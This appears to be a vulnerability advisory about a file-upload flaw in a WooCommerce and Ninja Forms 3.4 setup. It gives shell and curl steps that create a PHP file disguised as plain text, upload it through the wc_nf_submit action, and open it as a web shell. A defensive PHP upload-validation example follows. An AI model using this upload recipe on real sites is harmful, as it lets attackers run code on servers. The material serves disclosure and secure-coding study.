Make sure both WooCommerce and NinjaForms (NF's latest version on the 3.4 branch) are installed, then follow these steps:

1 - Run the following shell command to create a PHP file whose MIME type will be detected as text/plain:

echo 'Hello world! <?php phpinfo();' > shell.php

2 - Run the following curl command to upload the malicious PHP file onto the site:

curl '' -F 'action=wc_nf_submit' -F 'f[]=@shell.php'

3 - Visit the uploaded shell at '
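
The file from step 1 gets past any check that trusts only the content-sniffed MIME type, because its leading bytes read as plain text while the .php extension is kept. The following validation routine is an added example, not Ninja Forms or WooCommerce code; the function name nf_example_validate_upload, the ALLOWED_TYPES allowlist, and the premise that the handler relied on MIME sniffing are assumptions made for illustration.

```php
<?php
// Added example: hypothetical upload validation, not the plugin's code.
// Extension => MIME types accepted for it (constructed allowlist).
const ALLOWED_TYPES = [
    'txt' => ['text/plain'],
    'png' => ['image/png'],
    'pdf' => ['application/pdf'],
];

/**
 * Validate an upload by extension AND sniffed content type.
 * Returns [bool $ok, string $reason, ?string $storedName].
 */
function nf_example_validate_upload(string $clientName, string $tmpPath): array
{
    // Content sniffing looks at the file's bytes; the step 1 file
    // starts with ordinary text, so this alone does not flag it.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);

    // The extension decides how the web server treats the stored file,
    // so it must be on the allowlist regardless of the sniffed type.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return [false, "extension '$ext' not allowed", null];
    }
    // Extension and sniffed type must agree.
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        return [false, "MIME '$mime' does not match .$ext", null];
    }
    // Store under a server-generated name, never the client's name.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    return [true, 'ok', $stored];
}

// Constructed sample input: same content as the file from step 1.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "Hello world! <?php phpinfo();\n");

foreach (['shell.php', 'notes.txt'] as $name) {
    [$ok, $reason, $stored] = nf_example_validate_upload($name, $tmp);
    printf("%s -> %s (%s) %s\n", $name, $ok ? 'accepted' : 'rejected',
        $reason, $stored ?? '');
}
unlink($tmp);
```

Both checks are needed: the sniffed type only describes the file's first bytes, while the stored extension determines whether the server will hand the file to the PHP interpreter.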